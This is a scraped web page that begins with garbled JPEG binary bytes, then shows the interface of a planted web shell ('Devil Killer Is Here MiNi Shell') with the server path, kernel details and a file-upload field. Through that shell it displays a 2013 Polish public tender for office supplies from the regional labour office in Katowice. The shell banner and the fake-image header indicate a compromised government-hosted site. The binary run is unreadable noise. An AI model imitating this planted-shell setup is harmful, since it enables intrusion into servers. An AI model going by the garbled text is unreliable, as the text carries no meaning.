JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/217121-N-2013.html

<p class="kh_header"><b>Katowice: DOSTAWA MATERIAŁÓW BIUROWYCH</b><br>
<b>Numer ogłoszenia: 217121 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu woj.śląskiego nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I									 
Przedmiotem zamówienia w części I jest dostawa materiałów biurowych dla Lidera Projektu Kierunek Przedsiębiorczość:
Bloczek samoprzylepny 76 mm x 76 mm -10 szt., Długopis automatyczny z wymiennym wkładem wielko pojemnym niebieskim, obudowa z tworzywa sztucznego, klips i wykończenie niklowane, szerokość linii pisania 05-07 mm, długość linii pisania ponad 3000 m - 10 szt; Wkład do długopisu opisanego w poz. 2 - 10 szt., Długopis żelowy z wymiennym wkładem niebieski, czarny, czerwony o grubości linii 0,3 mm - 30 szt., Wkład do długopisu żelowego z poz. 4 - 30 szt., Długopis samoprzylepny na sprężynce z wymiennym wkładem - 10 szt., Dziurkacz z ogranicznikiem formatu z plastikową antypoślizgową nasadką, pojemnik na ścinki , min. 40 kartek - 5 szt., Kalkulator z dużym 12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165 mm x 115 mm x 22 mm - 5 szt., Klip do papieru   32 mm - 100 szt., Koperta C5 biała samoprzylepna pakowana po 10 szt. w opakowaniu - 10 op., Korektor w płynie ekologiczny z gąbką - 5 szt., Koszulka A4 groszek wykonana folii PP, pakowana po 100 szt. w opakowaniu, o gram. min. 48 mic - 2 op., Nożyczki wykonane z nierdzewnej stali  20 cm z gumowym uchwytem -5 szt., Przekładki do dokumentów z kolorowego polipropylenu formatu A4, pakowane po 10 kart - 5 op., Przybornik na biurko - walec dymny - 5 szt., Rozszywacz do dokumentów - 5 szt., Segregator A4 50 kolor z mechanizmem dźwigniowym - 10 szt., Skoroszyt  wielooczkowy  do zawieszania w segregatorze - różne kolory, pakowane po 20 szt. w opakowaniu - 5 op., Spinacze plikowe pakowane po 100 szt. w opakowaniu - 5 op.,  Szuflada na dokumenty pozioma - dymna - 15 szt., Taśma klejąca 24x20 mm  pakowana po 6 szt. - 5 op., Teczka do podpisu zawierająca co najmniej 15 kartek - 4 szt., Teczka z gumka  A4 - kolorowa , lakierowana - 30 szt., Zakreślacz ze ściętą końcówką z systemem kapilarnym z płynnym tuszem 
(różne kolory) - 10 szt., Zszywacz  o metalowej konstrukcji z uchwytem z niełamliwego plastiku, zszywający jednorazowo min. 25 kartek o głęb. zszywania 60 mm - 5 szt. Zszywki do zszywacza opisanego w pkt. 25 pakowane po 1000 szt. - 5 op., ołówek techniczny HB - 10 szt., notatnik 50kartkowy A5 grzbiet klejony w kratkę - 5 szt., segregator A4 75 kolor z mechanizmem dźwigowym - 20 szt., zakładki indeksujące co najmniej 4 kolory neonowe - 10 szt., Skoroszyt tekturowy biały zwykły zawieszany cały pakowany po 50 szt. - 1 op., gumka z tworzywa sztucznego przeznaczona do ścierania ołówka - 10 szt., ofertówka standardowa A4 L twarda bezbarwna pakowana po 25 szt.- 4 op., płyty CD - R 700 MB standard w kopertach - 30 szt., Teczki wiązane białe kartonowe format A4 - opakowania po 50 szt. - 1 op., zeszyt w kratkę 96K A4 w twardej oprawie - 5 szt., teczka segregująca z przekładkami - 12 przegródek - 10 szt., datownik - 1 szt., klej w sztyfcie - 5 szt., Biuwar  z  kalendarzem  na 2014 r. o wym.  600 mm x 400 mm 30 kartkowy, sklejony wzdłuż dolnej krawędzi - 5 szt., pendrive min. 4GB - 5 szt., koperta C4 biała samoprzylepna z rozszerzonym bokiem i dnem 10 szt., koperta A4 biała samoprzylepna pakowana po 10 szt. w opakowaniu - 10 op., Papier kserograficzny A4 80g w technologii ColorLok,  pakowany w paczkach po 500  arkuszy o białości min.  CIE 161 - 40 ryz.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, do pokoju 608 - VI piętro, od poniedziałku do piątku w godz. 8.00 -14.00, w terminie 7 dni od dnia zawarcia umowy. Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach.

Część II
Przedmiotem zamówienia w części II jest dostawa materiałów biurowych dla Partnerów (PUP) projektu Kierunek przedsiębiorczość w 30 zakresach.


Bloczek samoprzylepny 76 mm x 76 mm -1171 szt., Długopis automatyczny z wymiennym wkładem wielko pojemnym niebieskim, obudowa z tworzywa sztucznego, klips i wykończenie niklowane, szerokość linii pisania 05-07 mm, długość linii pisania ponad 3000 m-1259 szt., Wkład do długopisu opisanego w poz. 2-1234 szt., Długopis żelowy z wymiennym wkładem niebieski, czarny, czerwony o grubości linii 0,3 mm -1123 szt., Wkład do długopisu żelowego z poz. 4 -1550 szt., Długopis samoprzylepny na sprężynce z wymiennym wkładem-354 szt., Dziurkacz z ogranicznikiem formatu z plastikową antypoślizgową nasadką, pojemnik na ścinki , min. 40 kartek-191 szt, Kalkulator z dużym 12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165 mm x 115 mm x 22 mm-316 szt., Kalkulator z dużym 12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165 mm x 115 mm x 22 mm z drukarką-1 szt., Klip do papieru   32 mm- 1627 szt., Koperta C5 biała samoprzylepna pakowana po 10 szt. w opakowaniu-1286 op., Korektor w płynie ekologiczny z gąbką-244 szt., Koszulka A4 groszek wykonana folii PP, pakowana po 100 szt. w opakowaniu, o gram. min. 48 mic-231 op., Nożyczki wykonane z nierdzewnej stali  20 cm z gumowym uchwytem-143 szt., Papier kserograficzny A4 80g w technologii ColorLok,  pakowany w paczkach po 500  arkuszy o białości min.  CIE 161-1550 ryz, Przekładki do dokumentów z kolorowego polipropylenu formatu A4, pakowane po 10 kart-378 op., Przybornik na biurko - walec dymny-205 szt., Rozszywacz do dokumentów-179 szt., Segregator A4 50 kolor z mechanizmem dźwigniowym-1019 szt., Skoroszyt  wielooczkowy  do zawieszania w segregatorze - różne kolory, pakowane po 20 szt. w opakowaniu-213 op., Spinacze plikowe pakowane po 100 szt. w opakowaniu-295 op., Szuflada na dokumenty pozioma - dymna-424 szt., Taśma klejąca 24x20 mm  pakowana po 6 szt.-112 op., Teczka do podpisu zawierająca co najmniej 15 kartek-186 szt., Teczka z gumka  A4 - kolorowa , lakierowana-1188 szt., Zakreślacz ze ściętą końcówką z systemem kapilarnym z płynnym tuszem (różne kolory)-789 szt., zszywacz  o metalowej konstrukcji z uchwytem z niełamliwe plastiku, zszywający jednorazowo min. 25 kartek o głęb. zszywania 60 mm-206 szt., zszywki do zszywacza opisanego w pkt. 26 pakowane po 1000 szt.-630 op., ołówek techniczny HB -68 szt., notatnik 50kartkowy A5 grzbiet klejony w kratkę -139 szt., segregator A4/75 kolor z mechanizmem dźwigowym -101 szt., zakładki indeksujące co najmniej 4 kolory neonowe -36 szt., Skoroszyt tekturowy biały zwykły (pełny) pakowany po 50 szt.-14 op., Skoroszyt tekturowy biały zwykły zawieszany cały  pakowany po 50 szt.-15 op., gumka z tworzywa sztucznego przeznaczona do ścierania ołówka-28 szt., ołówek automatyczny z gumką 0,7 minka korpus transparentny, ergonomiczny uchwyt-100 szt., ofertówka standardowa A4 L twarda bezbarwna pakowana po 25 szt.-2 op., płyty CD - R 700 MB standard w kopertach-100 szt., płyty DVD + R w kopertach-60 szt., Teczki wiązane białe kartonowe format A4 - opakowania po 50 szt.-9 op., papier kserograficzny kolorowy - MIX 5 kolorów gramatura: 70 - 90 g/m2 w ryzie 250 arkuszy-1 op., zeszyt w kratkę 96K A4 w twardej oprawie-3 szt., teczka segregująca z przekładkami - 12 przegródek-5 szt., korektor myszka (taśma) -15 szt., datownik -4 szt., klej w sztyfcie-10 szt., mechanizm skoroszytowy z metalową blaszką z możliwością wpięcia do segregatora, 150 x 38 mm, pakowane po 25 szt.-10 op., identyfikator z klipsem i agrafką -20 szt., Biuwar  z  kalendarzem  na 2014 r. o wym.  600 mm x 400 mm 30 kartkowy, sklejony wzdłuż dolnej krawędzi-5 szt., magnesy do tablicy -24 szt., pendrive min. 4GB -10 szt., koperta C4 biała samoprzylepna z rozszerzonym bokiem i dnem-100 szt., koperty aktowe C4 zaklejane na krótkim boku samoklejące białe pakowane 250 szt.-2 op., koperta A4 biała samoprzylepna pakowana po 10 szt. w opakowaniu-2 op., Etykiety samoprzylepne format A4 (105mmx74mm +- 10% ) po 100 kartek-1 op., Etykiety samoprzylepne format A4 (70mmx35mm +- 10% ) po 100 kartek-1 op.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy od poniedziałku do piątku w godz. 8.00 -14.00 do pomieszczeń wskazanych w dniu dostawy w siedzibie poszczególnego PUP, zgodnie z opisem i zakresem zawartym w Rozdziale II SIWZ - część II:

1)	Zakres I - Powiatowy Urząd Pracy w Będzinie, ul. Ignacego Krasickiego 17A;
2)	Zakres II - Powiatowy Urząd Pracy w Bielsku-Białej, ul. Partyzantów 55;
3)	Zakres III - Powiatowy Urząd Pracy w Bytomiu, ul. Łagiewnicka 15;
4)	Zakres IV - Powiatowy Urząd Pracy w Chorzowie, ul. Opolska 19;
5)	Zakres V - Powiatowy Urząd Pracy w Cieszynie, Plac Wolności 6;
6)	Zakres VI - Powiatowy Urząd Pracy w Częstochowie, ul. Szymanowskiego 15;
7)	Zakres VII - Powiatowy Urząd Pracy w Dąbrowie Górniczej, ul. Sobieskiego 12;
8)	Zakres VIII - Powiatowy Urząd Pracy w Gliwicach, Plac Inwalidów Wojennych 12;
9)	Zakres IX - Powiatowy Urząd Pracy w Jastrzębiu - Zdroju, ul. Pszczyńska 134;
10)	Zakres X - Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9 b;
11)	Zakres XI - Powiatowy Urząd Pracy w Katowicach, ul. Pośpiecha 14;
12)	Zakres XII - Powiatowy Urząd Pracy w Kłobucku, ul. Długosza 114;
13)	Zakres XIII - Powiatowy Urząd Pracy w Lublińcu, ul. Sobieskiego 9;
14)	Zakres XIV - Powiatowy Urząd Pracy w Mikołowie, ul. Chopina 8;
15)	Zakres XV - Powiatowy Urząd Pracy w Myszkowie, ul. Partyzantów 21;
16)	Zakres XVI - Powiatowy Urząd Pracy w Piekarach Śląskich, ul. Ks. Popiełuszki 14;
17)	Zakres XVII - Powiatowy Urząd Pracy w Pszczynie, ul. Dworcowa 23;
18)	Zakres XVIII - Powiatowy Urząd Pracy w Raciborzu, ul. Klasztorna 6;
19)	Zakres XIX - Powiatowy Urząd Pracy w Rudzie Śląskiej, ul. Ballestremów 16;
20)	Zakres XX - Powiatowy Urząd Pracy w Rybniku, ul. Jankowicka 3;
21)	Zakres XXI - Powiatowy Urząd Pracy w Siemianowicach Śląskich, ul. Wyzwolenia 17;
22)	Zakres XXII - Powiatowy Urząd Pracy w Sosnowcu, ul. Rzeźnicza 12;
23)	Zakres XXIII - Powiatowy Urząd Pracy w Świętochłowicach, ul. Plebiscytowa 3;
24)	Zakres XXIV - Powiatowy Urząd Pracy w Tarnowskich Górach, ul. Towarowa 1;
25)	Zakres XXV - Powiatowy Urząd Pracy w Tychach, ul. Budowlanych 59;
26)	Zakres XXVI - Powiatowy Urząd Pracy w Wodzisławiu Śląskim, ul. Michalskiego 12;
27)	Zakres XXVII - Powiatowy Urząd Pracy w Zabrzu, ul. Roosevelta 40 a;
28)	Zakres XXVIII - Powiatowy Urząd Pracy w Zawierciu, ul. 11 Listopada 2 a;
29)	Zakres XXIX - Powiatowy Urząd Pracy w Żorach, ul. Osińska 48;
30)	Zakres XXX - Powiatowy Urząd Pracy w Żywcu, ul. Łączna 28;



UWAGI OGÓLNE:
Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego do każdego z zakresów zamówienia w 3 egzemplarzach (egzemplarz dla Wykonawcy, poszczególnego PUP oraz dla WUP).

Podstawą zapłaty będzie przedstawienie faktury wraz z podpisanymi protokołami zdawczo -odbiorczymi (30 protokołów z każdego zakresu zamówienia 1 szt.).W dniu zawarcia umowy Zamawiający przekaże Wykonawcy wykaz osób (do każdego zakresu zamówienia) upoważnionych do odbioru materiałów biurowych, sprawdzenia zgodności towaru z zamawianym towarem, podpisania protokołu odbioru..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE PRZEWIDUJE  WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 12:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Kierunek przedsiębiorczość współfinansowany przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego
w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I									 
Przedmiotem zamówienia w części I jest dostawa materiałów biurowych dla Lidera Projektu Kierunek Przedsiębiorczość:
Bloczek samoprzylepny 76 mm x 76 mm -10 szt., Długopis automatyczny z wymiennym wkładem wielko pojemnym niebieskim, obudowa z tworzywa sztucznego, klips i wykończenie niklowane, szerokość linii pisania 05-07 mm, długość linii pisania ponad 3000 m - 10 szt; Wkład do długopisu opisanego w poz. 2 - 10 szt., Długopis żelowy z wymiennym wkładem niebieski, czarny, czerwony o grubości linii 0,3 mm - 30 szt., Wkład do długopisu żelowego z poz. 4 - 30 szt., Długopis samoprzylepny na sprężynce z wymiennym wkładem - 10 szt., Dziurkacz z ogranicznikiem formatu z plastikową antypoślizgową nasadką, pojemnik na ścinki , min. 40 kartek - 5 szt., Kalkulator z dużym 12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165 mm x 115 mm x 22 mm - 5 szt., Klip do papieru   32 mm - 100 szt., Koperta C5 biała samoprzylepna pakowana po 10 szt. w opakowaniu - 10 op., Korektor w płynie ekologiczny z gąbką - 5 szt., Koszulka A4 groszek wykonana folii PP, pakowana po 100 szt. w opakowaniu, o gram. min. 48 mic - 2 op., Nożyczki wykonane z nierdzewnej stali  20 cm z gumowym uchwytem -5 szt., Przekładki do dokumentów z kolorowego polipropylenu formatu A4, pakowane po 10 kart - 5 op., Przybornik na biurko - walec dymny - 5 szt., Rozszywacz do dokumentów - 5 szt., Segregator A4 50 kolor z mechanizmem dźwigniowym - 10 szt., Skoroszyt  wielooczkowy  do zawieszania w segregatorze - różne kolory, pakowane po 20 szt. w opakowaniu - 5 op., Spinacze plikowe pakowane po 100 szt. w opakowaniu - 5 op.,  Szuflada na dokumenty pozioma - dymna - 15 szt., Taśma klejąca 24x20 mm  pakowana po 6 szt. - 5 op., Teczka do podpisu zawierająca co najmniej 15 kartek - 4 szt., Teczka z gumka  A4 - kolorowa , lakierowana - 30 szt., Zakreślacz ze ściętą końcówką z systemem kapilarnym z płynnym tuszem 
(różne kolory) - 10 szt., Zszywacz  o metalowej konstrukcji z uchwytem z niełamliwego plastiku, zszywający jednorazowo min. 25 kartek o głęb. zszywania 60 mm - 5 szt. Zszywki do zszywacza opisanego w pkt. 25 pakowane po 1000 szt. - 5 op., ołówek techniczny HB - 10 szt., notatnik 50kartkowy A5 grzbiet klejony w kratkę - 5 szt., segregator A4 75 kolor z mechanizmem dźwigowym - 20 szt., zakładki indeksujące co najmniej 4 kolory neonowe - 10 szt., Skoroszyt tekturowy biały zwykły zawieszany cały pakowany po 50 szt. - 1 op., gumka z tworzywa sztucznego przeznaczona do ścierania ołówka - 10 szt., ofertówka standardowa A4 L twarda bezbarwna pakowana po 25 szt.- 4 op., płyty CD - R 700 MB standard w kopertach - 30 szt., Teczki wiązane białe kartonowe format A4 - opakowania po 50 szt. - 1 op., zeszyt w kratkę 96K A4 w twardej oprawie - 5 szt., teczka segregująca z przekładkami - 12 przegródek - 10 szt., datownik - 1 szt., klej w sztyfcie - 5 szt., Biuwar  z  kalendarzem  na 2014 r. o wym.  600 mm x 400 mm 30 kartkowy, sklejony wzdłuż dolnej krawędzi - 5 szt., pendrive min. 4GB - 5 szt., koperta C4 biała samoprzylepna z rozszerzonym bokiem i dnem 10 szt., koperta A4 biała samoprzylepna pakowana po 10 szt. w opakowaniu - 10 op., Papier kserograficzny A4 80g w technologii ColorLok,  pakowany w paczkach po 500  arkuszy o białości min.  CIE 161 - 40 ryz.



Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, do pokoju 608 - VI piętro, od poniedziałku do piątku w godz. 8.00 -14.00, w terminie 7 dni od dnia zawarcia umowy. Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II
